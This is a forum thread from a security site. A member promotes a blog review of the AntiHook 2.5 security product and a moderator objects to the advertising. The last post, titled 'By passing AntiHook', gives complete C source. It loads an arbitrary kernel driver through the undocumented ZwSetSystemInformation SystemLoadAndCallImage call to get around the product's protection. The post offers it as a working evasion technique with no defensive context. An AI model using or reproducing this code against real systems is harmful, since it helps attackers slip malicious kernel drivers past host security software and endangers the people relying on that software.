dcsimg
Results 1 to 4 of 4
  1. #1

    AntiHook 2.5 Review and more

    Hi guys,

    New Big review for AntiHook 2.5 on my Blog check it out.

    http://securityonthenet.blogspot.com/

    Next on line BufferZone Home, Safe’n’Sec Personal and PervX home,

    Don’t forget the Show down between all Products to declare the best “Painkiller Blog Choose” Award

    Cheers
    _________________
    Painkiller
    ----------------------------------
    Hell yea

  2. #2
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,884
    Act now because the first 50 callers will receive one of our "Security for Dummiez" handbooks which you can carry in your backpack.

    Cmon dude. This site isn't an infomercial for your blog.

    --TH13
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  3. #3
    Dude. it's Google ads, after all it's Goggle Bloger ... what can i do ...


    Painkiller

  4. #4
    Senior Member
    Join Date
    Jun 2003
    Posts
    188
    By passing AntiHook

    Loading the driver

    #include <windows.h>
    #include <stdio.h>

    typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    #ifdef MIDL_PASS [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;

    #else // MIDL_PASS
    PWSTR Buffer;
    #endif // MIDL_PASS
    } UNICODE_STRING, *PUNICODE_STRING;

    typedef long NTSTATUS;

    #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

    NTSTATUS (__stdcall *ZwSetSystemInformation)(
    IN DWORD SystemInformationClass,
    IN OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength
    );

    VOID (__stdcall *RtlInitUnicodeString)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
    );

    typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
    {
    UNICODE_STRING ModuleName;
    } SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;

    #define SystemLoadAndCallImage 38

    int main(void)

    {

    SYSTEM_LOAD_AND_CALL_IMAGE img;

    WCHAR daPath[] = L"\\??\\c:\\some.sys";

    if( !(RtlInitUnicodeString = (void *)
    GetProcAddress( GetModuleHandle("ntdll.dll")
    ,"RtlInitUnicodeString"
    )
    )
    )
    {
    exit(1);
    }

    if(!(ZwSetSystemInformation = (void *)
    GetProcAddress(
    GetModuleHandle("ntdll.dll")
    ,"ZwSetSystemInformation"
    )
    )
    )
    {
    exit(1);
    }

    RtlInitUnicodeString(
    &(img.ModuleName)
    ,daPath
    );

    if(
    NT_SUCCESS(
    ZwSetSystemInformation(
    SystemLoadAndCallImage
    ,&img
    ,sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)
    )
    )
    )
    {
    printf("Loaded.\n");
    }
    else
    {
    printf("Not loaded.\n");
    }
    }

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  




×
We have made updates to our Privacy Policy to reflect the implementation of the General Data Protection Regulation.